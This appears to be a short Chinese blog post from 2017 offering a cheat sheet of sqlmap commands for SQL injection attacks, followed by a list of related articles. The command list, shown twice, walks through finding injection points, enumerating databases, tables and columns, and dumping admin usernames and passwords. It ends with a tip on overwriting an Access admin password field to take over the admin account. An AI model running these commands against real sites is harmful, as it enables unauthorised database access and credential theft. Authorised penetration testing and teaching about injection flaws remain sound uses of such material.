SQLmap数据库注入攻击
2017-09-16 14:46
232 查看
指令:
sqlmap -u url 扫描注入点扫描目标主机。(url前提是存在漏洞)
sqlmap -u url --users 获取到用户名
sqlmap -u url --dbs 爆出该sqlserver中所有数据库名称
sqlmap -u url --current -db 爆出当前web使用的数据库
sqlmap -u url --current -user web数据库使用的账户
sqlmap -u url -D (指定数据库名称) --tables 列出数据库中的表
sqlmap -u url -D 数据库名称 -T(指定要列出字段的表) --columns (指定列出字段)
sqlmap -u url -D** -T** -C“指定要爆的字段” --dump(导出)
<--start 1 --stop 10 --dump 第1到第10行>
sqlmap -u url --dump -tables 探测数据库和表的信息
sqlmap -u url --dump -T admin -C admin,password 进行暴库,获得用户名和密码
sqlmap:盲推理SQL注入,UNION查询SQL注入,堆查询,基于时间的SQL盲注。
***acess中 爆破后,admin加密为bfpms 将bfpms填到password字段中,就可以使用admin
http://blog.csdn.net/zgyulongfei/article/details/41017493/(sqlmap简单使用说明)
sqlmap -u url 扫描注入点扫描目标主机。(url前提是存在漏洞)
sqlmap -u url --users 获取到用户名
sqlmap -u url --dbs 爆出该sqlserver中所有数据库名称
sqlmap -u url --current -db 爆出当前web使用的数据库
sqlmap -u url --current -user web数据库使用的账户
sqlmap -u url -D (指定数据库名称) --tables 列出数据库中的表
sqlmap -u url -D 数据库名称 -T(指定要列出字段的表) --columns (指定列出字段)
sqlmap -u url -D** -T** -C“指定要爆的字段” --dump(导出)
<--start 1 --stop 10 --dump 第1到第10行>
sqlmap -u url --dump -tables 探测数据库和表的信息
sqlmap -u url --dump -T admin -C admin,password 进行暴库,获得用户名和密码
sqlmap:盲推理SQL注入,UNION查询SQL注入,堆查询,基于时间的SQL盲注。
***acess中 爆破后,admin加密为bfpms 将bfpms填到password字段中,就可以使用admin
http://blog.csdn.net/zgyulongfei/article/details/41017493/(sqlmap简单使用说明)
![](https://app.yinxiang.com/shard/s70/res/4421ef81-dbf7-49db-9f64-725faa280a99/C%28%5BUO%24Z%7B7%60%7D%5DHS5UDB8GZ%5BR.png)
相关文章推荐
- 数据库防注入攻击
- PreparedStatement 防数据库注入漏洞攻击
- 在 SQL 注入攻击 中,用户通过操纵表单或 GET 查询字符串,将信息添加到数据库查询中
- Burpsuite+SQLMAP双璧合一绕过Token保护的应用进行注入攻击
- 操作数据库(防注入攻击)
- 数据库被注入攻击 所有文本型字下段数据都被加了
- 数据库注入攻击和防止注入攻击
- 【黑马程序员】连接数据库时的注入漏洞攻击
- 数据库被注入攻击 所有文本型字下段数据都被加了
- 数据库注入攻击
- 数据库被注入攻击 所有文本型字下段数据都被加了
- 看好你的门-攻击服务端(2)-注入XML实体 窃取本地数据库配置
- 清除数据库被注入的所有js
- sqlmap 注入基本用法
- asp中防止脚本注入攻击
- 防止sql 注入攻击方法
- MSSQL2005注入攻击(测试兰州电信)
- 在ASP.NET中防止注入攻击[翻译] .doc
- Web的脆弱性:各种注入、攻击